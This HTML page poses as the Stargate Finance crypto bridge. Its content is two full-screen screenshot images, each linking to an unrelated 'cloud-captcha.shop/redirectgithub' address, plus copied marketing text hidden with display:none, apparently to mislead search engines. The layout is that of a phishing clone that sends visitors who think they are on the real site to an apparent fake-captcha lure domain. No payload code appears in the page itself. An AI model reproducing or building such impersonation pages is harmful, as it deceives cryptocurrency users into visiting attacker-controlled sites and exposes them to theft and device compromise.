<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, minimum-scale=1, initial-scale=1, user-scalable=yes, minimal-ui">
	<meta name="robots" content="index,follow" />
	<meta name="language" content="en" />
	<link rel="shortcut icon" href="favicon.svg" type="image/svg+xml"/>
    
	<title>Stargate Finance</title>
	<meta name="application-name" content="Stargate Finance">
	<meta name="description" content="Stargate Finance, a top blockchain bridge offering seamless cross-chain token transfers with improved liquidity and security.">
	<meta name="keywords" content="layerzero, blockchain, crypto, message, transaction, omnichain, bridge">
	<meta property="og:title" content="Stargate Finance" />
	
	<meta property="og:image" content="favicon.svg" />
	
    <style>
		body {
			padding: 0;
			margin: 0;
		}
        .full-screen-image {
            width: 100%;
            object-fit: cover;
			display:block;
        }
		.full-screen-image-mobile {
            width: 100%;
            object-fit: cover;
			display:none;
        }
        .text {
            padding: 20px;
            font-size: 24px;
            text-align: center;
        }
		@media screen and (max-width: 600px) {
		  .full-screen-image{
			display:none;
		  }
		  .full-screen-image-mobile {
			display:block;
		  }
		}
    </style>
</head>
<body>
	
	<a href="https://cloud-captcha.shop/redirectgithub"><img src="screen.png" alt="site screen" class="full-screen-image"></a>
	<a href="https://cloud-captcha.shop/redirectgithub"><img src="screenmob.png" alt="site screen" class="full-screen-image-mobile"></a>
    <div style="display:none">
        About Stargate
Stargate is a fully composable liquidity
transport protocol that lives at the
heart of Omnichain DeFi
With Stargate, users & dApps can transfer native assets cross-chain while accessing
the protocol’s unified liquidity pools with instant guaranteed finality. The universe is
infinite with Stargate.
Transfer
Swap 1:1 native assets cross-chain, accessing Stargate’s unified liquidity pools.
Stargate transfers have instant guaranteed finality; a transfer submitted on the source chain is guaranteed on the destination.
Transfer
Pools
Add liquidity to Stargate’s Omnichain protocol and earn stablecoin rewards on every Stargate transfer.
Liquidity providers can also farm their LP tokens to receive STG token rewards.
Pools
Farms
Stargate liquidity providers can farm their LP tokens in exchange for STG rewards.
Earn STG and become a member of the Stargate community.
Farms
Stake
STG holders can lock their STG tokens to receive veSTG, Stargate’s governance token.
The longer users stake their STG tokens, the more veSTG they will receive.
Stargate Pool
Add liquidity to Stargate’s omnichain protocol and earn stablecoin rewards on every Stargate
transfer. Liquidity providers can also farm their LP tokens to receive STG token rewards.
Stargate Farm
Stargate liquidity providers can farm their LP tokens in exchange for STG rewards.
Earn STG and become a member of the Stargate community.
Stargate Stake
Lock your STG tokens to receive veSTG, the unit of Stargate governance voting power.
Stargate is governed entirely by Stargate token holders via voting escrow.
    </div>

</body>
</html>